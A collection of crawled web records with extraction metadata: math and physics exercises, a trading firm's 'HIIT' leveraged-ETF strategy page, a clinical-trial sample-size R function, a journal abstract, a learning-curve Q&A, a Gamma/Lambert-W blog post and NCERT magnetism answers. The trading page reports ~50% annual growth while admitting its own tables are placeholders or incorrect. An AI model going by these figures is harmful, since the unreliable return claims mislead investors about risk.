Now we need to subtract 3/10
$$\frac{13}{3}$$-$$\frac{3}{10}$$$$\frac{130}{30} - \frac{9}{30}$$=$$\frac{121}{30}$$
121/30 miles or 4 1/30 miles
Let me know if I did anything wrong!
Mar 4, 2021 | 2021-09-27 09:25:51 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9245575070381165, "perplexity": 10260.197550682975}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780058415.93/warc/CC-MAIN-20210927090448-20210927120448-00292.warc.gz"} |
https://brilliant.org/problems/a-mechanics-problem-by-ritesh-yadav/ | # A classical mechanics problem by Ritesh Yadav
Classical Mechanics Level 2
As the speed of the particle increases its rest mass will...
× | 2016-10-25 13:57:31 | {"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8350178599357605, "perplexity": 2868.376475121858}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-44/segments/1476988720153.61/warc/CC-MAIN-20161020183840-00120-ip-10-171-6-4.ec2.internal.warc.gz"} |
https://wiki.marketchronologix.com/kb/hiit-strategy | Article Categories
Financial Concepts
Performance Metrics
# INTRODUCTION
The HIIT strategy aims to increase the number of trades per year while also maintaining a relatively low temporal exposure to the market. In back testing HIIT performed roughly 10 to 12 trades per year with a Pwin (Probability of Win) percentage above 80%.
HIIT adheres to the MCI principle that it is best to invest into market weakness in an otherwise up-trending market. It buys into weakness (oversold) and sells into strength (overbought). HIIT has proprietary algorithms and metrics that are designed to determine the strength of current market conditions and dynamically adjust itself accordingly. The algorithm adjusts its level of aggressiveness by scaling the size and number of trades from high to low as the market moves from a robust bull market to a fragile bull market. As the market becomes less bullish and more bearish, the algorithm begins to mix conservative long trades with conservative short trades. During bear market conditions, the algorithm only conducts short trades. The opposite transition also takes place as the market transitions from a bear market back to a bull market.
Each HIIT trigger is made by assessing short term weakness based on the magnitude of its pullback and the rate in which it falls. If the magnitude and rate of the market drop are within acceptable parameters, a buy trigger will be made. Each trigger is based on the concept of “Averaging Into” a position. A position may open with a fraction of available capital. If conditions become more favorable after opening the position, the algorithm will indicate allocating additional capital to the position. This process is known as position sizing or scaling into a position. Because our algorithms can’t guarantee the most optimal time to open a position, this process is used to potentially capture many small while initially committing less capital with the idea of increasing the position at a more favorable price, thereby reducing the average cost of entry and also reducing the risk of a losing trade.
averaging into positions is done to buy into market weakness and sell into strength. However, the difficulty lies in knowing where the bottom of the weakness occurs. By increasing the number of possible entries, a trader can decrease his/her margin for error and increase the probability of a winning trade (Pwin). Our algorithms evaluate multiple metrics to determine how to average into a position. These metrics provide measures of various market conditions including short and long term trending, market strength, volatility, etc. When the conditions are considered safer (i.e. the probability of a winning trade based on historical performance exceeds a predetermined threshold), the algorithm becomes more aggressive and scales in with larger positions. Conversely, when conditions are deemed riskier (i.e. the probability of a winning trade meets a lower threshold) the algorithm scales in more conservatively.
# SCALE-IN POSITION
This algorithm trades SPXL on the long side and SPXS on the short side.
SPXL is the Direxion Daily S&P 500 Bull 3x Shares, which seeks daily investment results, before fees and expenses, of 300% of the S&P 500 index. Conversely, SPXS is the opposite of SPXL and seeks 300% of the inverse (or opposite) of the performance of the S&P 500 Index. When conducting trades, both are long purchases, the algorithm does not actually enter short positions on any ETFs.
It is possible to utilize the HIIT triggers with other ETFs of varying leverage (1x or 2x) on the S&P 500 index. Limited back testing on these lower leveraged products shows reduced equity volatility but at the expense of greatly diminished returns over time.
Below are illustrations (not real trades) explaining how a **HIIT** scale-in position may occur.
In each of these examples, it is assumed that the trading account (or the capital available to trade this strategy) is $10,000. The percentages illustrated will be against this$10,000 amount.
Figure 1 provdes an illustration of possible scale-in positions where the algorithm has chosen a 10% / 20% / 30% / 40% allocation based on determined market conditions.
FIGURE 1: Example showing a long scale-in position using 10% / 20% / 30% / 40% allocation.
• Example A: shows a single trigger for a 10% allocation followed by a market rebound before a second scale-in allocation could be made.
• Example B: shows a trigger for a 10% allocation at position (1). The market then moved down and a 20% trigger allocation occured at position (2). The market then rebounded before a third level of scale-in could be established.
• Example C: shows a trigger at position (1) for a 10% allocation followed by a 20% allocation at position (2), a 30% allocation at position (3), and a final allocation of 40% at position (4). at position (4) the algorithm has signaled that allavailable capital should be allocated (10% + 20% + 30% + 40% = 100%). These additional positions reduce the cost of entry relative to the first trigger.
The second example in Figure 2, below, illustrates a similar possible scale-in position where the algorithm determined that a 50% / 50% allocation is warranted.
FIGURE 2: Example showing a long scale-in position using a 50% / 50% allocation.
• Example A: shows a single trigger for a 50% allocation followed by a market rebound before a second scale-in allocation could be made.
• Example B: shows a trigger for a 50% allocation at position (1). The market then moved down and an additional 50% allocation occurs at position (2). The market then rebounded and all shares were sold at position (S).
There are also times when the HIIT algorithm indicates a single scale-in position of 100% of the available funds, and this is illustrated in Figure 3.
FIGURE 3: 100% allocation trade setup.
• Example A: shows a single scale-in trigger for 100% followed by a market rebound resulting in a positive trade.
The HIIT algorithm attempts to conduct quick trades with open positions that last on the order of a few days. However, under some conditions the algorithm will stay in the trade for a longer period as it attempts to ride a longer-term uptrend. These longer trades can last for several weeks or even months These trades are relatively rare and occur roughly 10% of the time in the back testing. Often they are far more profitable than are the smaller, quicker trades. Figure 4 illustrates how such a trade may manifest.
FIGURE 4: 50% / 50% allocation trade setup.
• Example A: illustration of a two scale-in triggers followed by a longer term uptrend. Conditions in this example are right to allow the algorithm to stay in for a longer more profitable trade.
# BACK TESTING RESULTS
## REAL SPXL DATA 2008 TO 2016
Below is the back testing report on this strategy going back to the inception of SPXL and SPXS in the year 2008.
TABLE 1: HIIT results from the inception of SPXL to Dec 2016** (NOTE: HIIT data is not correct. New data will be posted soon. The following discussion may reference the data that will be showing up in the near future.)
The results in Table 1 show that HIIT is a high performing strategy that significantly outperforms the benchmark of holding the SP500. Over the 8+ year period it had a Compound Annual Growth Rate (CAGR) near 50%. Along with a high CAGR, this strategy also provided a very high Pwin of 88%, thereby providing a high level of confidence in its outperformance over the benchmark. Note that a single trade is determined between the first allocation until the time all funds are sold. So, whether 10% or 100% was allocated, the win assessment for a particular trade is determined by assessing whether money would have been made at the time all funds were sold. In short, if the account has more money after selling all funds than it did prior to the purchase of any shares, then it is a win.
This strategy is not perfect, as nearly 12% of the trades resulted in a loss. The average recovery time from a losing trade, however, is very reasonable. Over this time it was just 32 bars where a bar is a trading day (i.e. weekends and holidays are not counted). This indicates that when a losing trade occurs, there is a high probability that subsequent trades can recover in approximately six weeks on average. With the high CAGR, a high Pwin, and a higher average profit vs loss per trade, the occasional losing trade is tolerable given the overall strategy performance.
The remainder of this discussion is being reviewed and is not accurate at this time. Updates will be coming soon.
Another very important statistic is the exposure to the market. This performance metric measures the percentage of trading days that this strategy has an open trade. Generally, with a given CAGR and Pwin, the lower the number the better. This measures the efficiency by which the strategy is able to achieve its results. It also is a measure of risk, the less amount of time that a trader is in the market the less likely he/she will be exposed to potential unexpected market movement that may result in a equity drawdown. So, while one needs to be in the market in order to make money, it is best to be in the market at the most optimal periods to make that money, and to sit in cash otherwise. The results in Table show that HIIT’s exposure is just 20%. That means that this strategy is exposed to the market only 20% of the time, and yet is still able to achieve a outperformance of 50% on the CAGR. Compare that the buy and hold benchmark of the SP500 where it is always exposed and achieves a CAGR of only 12%.
EXAMPLES OF ALGORITHMIC TRIGGERS
Below is a price chart of the SPXL from 2013 to 2016 showing a sample of HIIT buy and sell triggers.
The green up arrows depict buy triggers, while the red down arrows depict when all shares were sold.
FIGURE 5: Buy and Sell trigger examples from the HIIT strategy between 2013 and 2016
EQUITY GROWTH OF BACKTESTED RESULTS
Below is the equity growth over time from the inception of SPXL in 2008. This is a linear plot illustrating what would have occurred by reinvesting all profits right back into the strategy.
FIGURE 6: Linear equity plot of the HIIT strategy from 2008 to 2016
Looking at figure 6 above, it can be seen that the HIIT strategy far outperforms the buy and hold of the SP500. It does so, so much that the red line depicting the buy and hold on the SP500 is barely visible.
Keep in mind that we do not expect anyone including ourselves to take $10,000 and trade it to tens of millions in a mere 8 years’ worth of trading. This is for illustration purposes only, to illustrate the potential for this strategy to boost our existing investment portfolio. To learn more about how our trading strategies are not ‘get rich quick schemes’, please click here. Below is a log plot of what is seen in Figure 6. This is a useful plot because it allows the reviewer to see variability throughout the entire period of testing. It basically linearizes the exponential effects of the compounded growth rate, thereby allowing the reviewer to observe the consistency of the strategy over time FIGURE 7: Log equity plot of the HIIT strategy from 2008 to 2016 Figure 7 above shows that the strategy is very consistent over the 8 year back test period. The dotted line is an exponential regression through the data based on a compounded growth of 50% per year. The R2 value is 0.98, meaning that the line does a very good job of describing the data. A perfect score would be 1.00. This means that the strategy performs consistently well year after year. INCLUSION OF SIMULATED SPXL/SPXS In our opinion, 8 years of back testing data is not enough for us to gain trust in the algorithmic trading strategy. To increase the size of our SPXL/SPXS back testing dataset we generated simulated these from the underlying issue SPX. SPXL is the Direxion Daily S&P 500 Bull 3x Shares where it seeks daily investment results, before fees and expenses, of 300%. Conversely, SPXS is the opposite where it seeks 300% of the inverse (or opposite) of the performance of the S&P 500 Index. We took the known statistics between the relationship between SPXL/SPXS and SPX and generated a matching profile that could be applied to SPX data that runs from 1991 to 2008 to create a complete dataset of 25 years’ worth of back testing data. We then verified that the simulation matched well against real data from 2008 forward. The table below is a summary of the results over the last 25 years of back testing data – which includes both simulated and real SPXL/SPXS data. TABLE 2: Summary of HIIT results from 1991 to Dec 2016** (NOTE: this is only a placeholder at this time actual HIIT statistics will be updated at a later date) The results of this back testing are very encouraging. It generated a CAGR of over 50% over that period with a win rate over 90%. It was able to recover quickly from a losing trade when they did occur, and had a relatively low exposure rate in conjunction with a high growth rate. The results below provide further evidence that this is a high performing trading strategy. EQUITY GROWTH OF BACKTESTED RESULTS USING SIMULATED SPXL/SPXS Below in Figure 8 is the 25-year linear equity results of what occurs with a starting value of$10,000 invested into the HIIT strategy. It also includes the SP500, provided as a reference. Please note that the SP500 profile is plotted using the secondary right hand axis. This is done so that the reviewer can easily compare the shape and volatility of both to see how the HIIT strategy performed in various market conditions.
FIGURE 8: Linear equity plot of the HIIT strategy from 1991 to 2016. Also provides the SP500 on the right hand axis as a reference
When looking at the SP500 profile, notice the amount of volatility that exist in the broader market as well as the inconsistent direction of the market over the 25-year period. During this time period there were two severe bear markets that resulted in a 45% drawdown from 2000 to 2003 and a 55% drawdown that occurred between 2008 and early 2009.
One area that we were especially interested in assessing was how the strategy would perform as the broader market transitioned from a long term bull market to a severe bear market, and then back into a bull market. As evidenced in Figure 9 below, the HIIT algorithm performed very well during the two bear markets and transitioned gracefully as the bull market picked up.
The log plot in figure 9 linearizes the exponential effects of the compounded growth rate, thereby allowing the reviewer to observe the consistency of the strategy over time. This can be seen by looking at the dotted red regression line through the data below in figure 9. Notice how consistently the data follows this linear regression straight through the bull markets as well as the bear markets. This means that the strategy was consistent in maintaining a CAGR of 50% over the entire 25 year period.
FIGURE 9: Log equity plot of the HIIT strategy from 1991 to 2016. Also provides the buy and hold SP500 results on the right hand scale.
CONTINUOUS TWO-YEAR PERFORMANCE
Lastly, we want to provide further evidence of the consistency that the HIIT algorithm has been able to perform over a long period of time.
Figure 10 represents the absolute 2-year return that we could have expected when beginning the strategy on any given trading day over the past 25 years. It takes the 2-year return beginning on the first day 25 years ago and then rolls it forward to attain thousands of 2-year samples. The results show that regardless of the starting point over that 25-year period, the return 2-years later would have been very good.
The lowest performing 2-year period was in the 40% range with the average over 150%.
FIGURE 10: Histogram on the continuous two-year performance
# CONCLUSION
Each HIIT trigger is made by assessing short term weakness based on the magnitude of its pullback and the rate in which it falls. The algorithm assesses the magnitude and rate of the market drop to determine if a buy trigger will be made. This strategy identifies when the market is oversold and then averages into the position as it becomes more oversold.
We feel the HIIT strategy is a high performing strategy that can be used to amplify our existing investment strategies. It has a Pwin of 90% and a CAGR of over 50% through 8 years of testing on SPXL/SPXS.
The addition of simulated data going back 25 years suggests that the trading algorithm is a high performing strategy able to benefit from a large diverse range of market conditions that include various levels of volatility in both bear and bull markets.
Disclaimer: Market Chronologix, Inc. makes a good-faith effort to accurately convey the performance metrics of our strategies, but we assume no liability for incorrect information, or for any losses that may be incurred as a result of using these strategies. Past performance of our strategies does not guarantee or imply that they will continue to perform at the same level in the future. All investing involves a degree of risk. You may have a profit or a loss when you sell shares of an investment, and you should carefully consider what level of risk you can accept before investing any money. We are not registered financial advisers and do not offer investment advice, nor should any of our written materials or services be construed as such. | 2020-07-05 05:57:11 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.37321534752845764, "perplexity": 1636.0342433285668}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-29/segments/1593655887046.62/warc/CC-MAIN-20200705055259-20200705085259-00586.warc.gz"} |
https://stattools.crab.org/R/Help%20Documents/Binomial_Non_Inferiority_HelpDoc.html | ## Source
Kopecky K and Green S (2012). Noninferiority trials. In: Handbook of Statistics in Clinical Oncology. Crowley J and Hoering A, eds. CRC Press, Boca Raton, FL USA.
## Description
This program calculates the required sample size for a two-arm non-inferiority design with a binomial outcome. N is calculated by the following formula for specified power = 100(1 - $$\beta$$)% and the true success probabilities are $$P_{E}$$ and $$P_{S}$$: $N = [\frac{Z_{\alpha/2} + Z_{\beta}}{M + (P_{E} - P_{S})}]^2 * [\frac{P_{E}(1 - P_{E})}{K_{E}} + \frac{P_{S}(1 - P_{S})}{1 - K_{E}}]$ where
• N is the total number patients
• $$K_{E}$$ is the proportion randomized to E.
## Input Items
### Noninferiority Margin input option
• Alpha level (one-sided) $$\alpha$$: The desired type I error rate. This corresponds to a specification of a (1 - 2 * $$\alpha$$)% confidence interval around the difference between the rates.
• Power: Enter the desired power, 0-1, to rule out the null hypothesis of inferiority.
• Noninferiority Margin: Enter the largest acceptable difference in success rates between the standard arm and the experimental arm that would be consistent with noninferiority.
• Proportion of patients in the experimental arm (0.5): Enter the proportion of patients (0-1) out of the total N that will be assigned to the experimental arm.
• Success Probability in Standard Arm and Experimental Arm: Enter the expected success probability for the standard arm, and the experimental arm. Typically these are specified as equal, but equality is not required.
### Success Probability input option
• Alpha level (one-sided) $$\alpha$$: The desired type I error rate. This corresponds to a specification of a (1 - 2 * $$\alpha$$)% confidence interval around the difference between the rates.
• Power: Enter the desired power, 0-1, to rule out the null hypothesis of inferiority.
• Success Probability in Experimental Arm (Under H0): Enter the assumed success probability under the null hypothesis. Note that the difference between the success probability in the standard arm, and this input, is the largest acceptable difference that would be consistent with noninferiority.
• Proportion of patients in the experimental arm (0.5): Enter the proportion of patients (0-1) out of the total N that will be assigned to the experimental arm.
• Success Probability in Standard Arm and Experimental Arm: Enter the expected success probability for the standard arm, and the experimental arm. Typically these are specified as equal, but equality is not required.
## Output Items
• Total sample size.
## Statistical Code
The program is written in R.
View Code
function(alpha_level, power_level, margin, p_success_E, p_success_S, k_E)
{
za = qnorm(alpha_level, lower.tail = FALSE)
zb = qnorm(power_level)
n = ((za + zb) / (margin + p_success_E - p_success_S))^2 * (((p_success_E * (1 - p_success_E)) / k_E) + ((p_success_S * (1 - p_success_S)) / (1 - k_E)))
result = list(n = round(n, digits = 0))
return(jsonlite::toJSON(result, pretty = TRUE))
} | 2023-03-20 15:51:59 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8274860382080078, "perplexity": 2713.0027799060085}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296943484.34/warc/CC-MAIN-20230320144934-20230320174934-00713.warc.gz"} |
https://www.impan.pl/pl/wydawnictwa/czasopisma-i-serie-wydawnicze/fundamenta-mathematicae/all/156/2/110529/on-pettis-integral-and-radon-measures | # Wydawnictwa / Czasopisma IMPAN / Fundamenta Mathematicae / Wszystkie zeszyty
## On Pettis integral and Radon measures
### Tom 156 / 1998
Fundamenta Mathematicae 156 (1998), 183-195 DOI: 10.4064/fm-156-2-183-195
#### Streszczenie
Assuming the continuum hypothesis, we construct a universally weakly measurable function from [0,1] into a dual of some weakly compactly generated Banach space, which is not Pettis integrable. This (partially) solves a problem posed by Riddle, Saab and Uhl [13]. We prove two results related to Pettis integration in dual Banach spaces. We also contribute to the problem whether it is consistent that every bounded function which is weakly measurable with respect to some Radon measure is Pettis integrable.
#### Autorzy
• Grzegorz Plebanek
## Przeszukaj wydawnictwa IMPAN
Zbyt krótkie zapytanie. Wpisz co najmniej 4 znaki.
Odśwież obrazek | 2022-08-09 10:31:08 | {"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9078806042671204, "perplexity": 3704.7846618528315}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882570921.9/warc/CC-MAIN-20220809094531-20220809124531-00745.warc.gz"} |
https://datascience.stackexchange.com/questions/44087/how-can-i-check-if-a-bigger-training-data-set-would-improve-my-accuracy-of-my-sc/44145 | # How can I check if a bigger training data set would improve my accuracy of my scikit classifier?
How can I check if a bigger training data set would improve my accuracy of my scikit classifier, is there a method or something?
• Do you mean actual accuracy or model performance in general? – Roman Jan 16 '19 at 14:01
One idea:
1. Split your data into train / hold out datasets.
2. Train the model on a fraction of the training data (say 50%) and test on the holdout dataset.
3. Train the model on a larger fraction of the training data (say 75%) and test on the holdout dataset.
It's important that you use the same holdout data for testing so you can perform a true test of accuracy.
Since you're doing classification, you should check that your data is balanced, and adjust if not (this may also improve your accuracy without needing larger training data).
The Validation Curve method (available on Scikit) plots the cross-validation score of your metric as you increase the number of training examples. If the model performance starts stagnating with the training examples of your original dataset, it may be a symptom that a bigger dataset will not improve your classifier's performance.
This also allows you to clearly observe the Bias vs Variance behaviour of your model.
As shown in the image below (source), you have a high bias (underfitting) when the both training and validation performances are clearly below your target. On the other side, you can overfit and cause your model to perform much better on the training dataset than in the validation, causing high variance (aka overfitting).
A well trained model will perform with a good Bias vs Variance trade-off, both performing near the desired target and performing evenly in both training and validation datasets.
• Can I plot such a learning curves diagramm for the scikit MLPCassifier too? – jochen6677 Feb 1 '19 at 10:12
• Yes, the Learning Curve is agnostic to the model. Check this example here – UrbanoFonseca Feb 1 '19 at 10:23
• But how shall I interpret the diagramm above: Does it tell me that if I would collect about 1200 training samples in total this would be the optimum number of training samples because further training samples would not improove my accuracy? – jochen6677 Feb 4 '19 at 10:24
• I just updated the answer explaining the Bias vs Variance. From the 1st image, it appears that increasing the number of samples from 1200 to 1400 creates small marginal improvements to the model's performance. If you achieve your expected performance target with 1200 samples you can consider this as the most efficient training sample size. In the end you have a trade-off between number of samples (e.g. computing speed) and the model's performance (plus the original bias vs variance trade-off). – UrbanoFonseca Feb 4 '19 at 11:35 | 2021-05-06 02:55:03 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.39434921741485596, "perplexity": 832.2772903046364}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-21/segments/1620243988725.79/warc/CC-MAIN-20210506023918-20210506053918-00592.warc.gz"} |
https://franklin.dyer.me/post/85 | The Gamma and Lambert-W Functions
2017 June 21
Find the values of the following integrals, where $W(x)$ denotes the inverse function of $y=xe^x$ from $0$ to $\infty$:
I will be devoting this post to two very interesting and related functions: the Gamma Function $\Gamma(z)$ and the Lambert-W Function $W(z)$.
I will start off with the basics of the Lambert-W function. This function is taken to be the inverse function of $y=xe^x$. Here are two graphs, one of $y=xe^x$ (in red), and one of the Lambert-W function (in blue).
As you can see, $y=xe^x$ is not injective and should not have an inverse, but because only a small branch of it is non-injective, it can be useful to treat is as if it had an inverse anyways. This is what the Lambert-W function is for. That function cannot be inverted anyways using elementary functions, so the Lambert-W function is what we treat as its inverse. However, since it is not actually injective, the Lambert-W function has two branches: the lower branch $W_{-1}$ and the upper branch $W_0$. The point at which the function changes between these two branches is at the point corresponding to the minimum of $y=xe^x$, the point $(-\frac{1}{e},-1)$ on the Lambert-W function. Because it is defined as the inverse of $y=xe^x$, it has the properties
The value $W(1)$, or the unique solution to the equation is called the omega constant $\Omega$ and is about $0.5671$. We will be using it in some of our later integral problems.
This function can be used to "solve" many new types of equations. For example, consider the equation This equation can be solved using the Lambert-W function in the following way: There are two possible values satisfying this, since both branches of the Lambert-W function exist at $x=-\frac{1}{3}$.
Here's another example: This can be solved in the following way:
The derivative of the Lambert-W function is given by I will not go into the details of the derivation of this formula, because it can be attained easily using the formula for the derivative of the inverse of a function, in this case the function $f(x)=xe^x$. Furthermore, its antiderivative is which can also be obtained with the use of a formula.
We will now derive two identities of the Lambert-W function that we will now prove that may become helpful later. The first is the sum identity and the second is the product identity Here is the derivation of the first identity: And here is the derivation of the second:
Before we move into the "good stuff", it would be best to introduce the Gamma Function, as it can save a lot of time when evaluating some of the integrals that we will later evaluate.
Basically, the Gamma Function is an extension of the factorial function to non-natural numbers. It has the property So it is essentially the factorial function, translated one unit. It is defined as Its relation to the factorial function can be proven using induction. First we must show that $\Gamma(1)=1$:
Wonderful. Now we must begin the inductive part of the proof. If we use integration by parts, we can observe that Which means that Which completes our inductive proof.
One thing that is helpful when working with the Gamma Function is knowledge of the Gaussian Integral; that is, the integral This integral comes up often when evaluating particular values of the Gamma Function. For example, look what happens when we try to evaluate $\Gamma\bigg(\frac{1}{2}\bigg)$: If we make the substitution $x \to y^2$, this integral turns into Which is just the same as the Gaussian Integral, and so
I'll spare you the derivations of the first couple values of this type of the Gamma Function, as they each involve a lot of integration by parts and are very repetitive. Here they are:
Are you noticing a pattern?
Do you see it? This can lead us to conjecture that
This can be proven easily using induction. This proof is also inductive and also uses integration by parts. The first step is recalling that $\Gamma(\frac{1}{2})$ is equal to $\sqrt{\pi}$. Then we can begin our inductive step. By definition, And if we use integration by parts, we notice that Meaning that Which completes the induction step of our proof.
It can be proven similarly that where $!_k$ represents the kth factorial (that is, $!_2$ is $!!$, $!_3$ is $!!!$, and so on). This fact will be useful to us later on.
One final notable formula regarding the Gamma Function is its reflection formula, derived by Euler:
However, we will not use it much, and so we will not derive it here. Perhaps in a later post that is focused solely on the Gamma Function.
Before we start the integrals, let me remind you of the definite integral property Because we will be using it a lot in the upcoming problems.
First off, we will tackle the least intimidating of the integrals: It seems impossible at first to integrate over a function that cannot even be expressed using other elementary functions. However, we can use the trick that I just mentioned, along with the fact that $W(x)$ is defined as the inverse of $xe^x$. Let's use the trick with $g(x)=xe^x$. Then we get $W(0)$ is $0$ and $W(1)$ is the omega constant, so we can now simplify the integral and the rest of the bounds: Using integration by parts, we can reduce this to Remember, since $\Omega=W(1)$, we can simplify $\Omega e^\Omega$ to $1$: Furthermore, since $\Omega e^\Omega=1$, then $e^\Omega=\frac{1}{\Omega}$, so our simplified answer is and so
On to the next one: Let us again use our "trick" with $g(x)=xe^x$: Now the integral can be solved readily by using integration by parts over and over again. I'll spare you the details:
Now for the integral This time we can use $g(x)=-\ln(xe^x)=-\ln(x)-x$ to get the much easier integral and so
Next up is Let us once again use $g(x)=xe^x$ to get Now we can recognize the relevance of the gamma function. If we use $g(x)=2x$ then we get and, since we have already obtained these values for the Gamma Function, we have and so
Now for the final integral: First we will use $g(x)=\sqrt{\frac{1}{x}e^{-x}}$, which gives us Now let us use $g(x)=2x$: and so
And that concludes this blog post! | 2019-06-27 07:14:23 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9417663812637329, "perplexity": 123.29586973888266}, "config": {"markdown_headings": false, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-26/segments/1560628000894.72/warc/CC-MAIN-20190627055431-20190627081431-00338.warc.gz"} |
https://24tutors.com/ncert-solutions-class-10-science-chapter-13-magnetic-effects-of-electric-current/ | # Magnetic Effects of Electric Current
## Class 10 NCERT Science
### NCERT
1 Why does a compass needle get deflected when brought near a bar magnet?
##### Solution :
A compass needle is a small bar magnet. When it is brought near a bar magnet, its magnetic field lines interact with that of the bar magnet. Hence, a compass needle shows a deflection when brought near the bar magnet.
2 Draw magnetic field lines around a bar magnet.
##### Solution :
Magnetic field lines of a bar magnet emerge from the north pole and terminate at the south pole. Inside the magnet, the field lines emerge from the south pole and terminate at the north pole, as shown in the given figure.
3 List the properties of magnetic lines of force.
##### Solution :
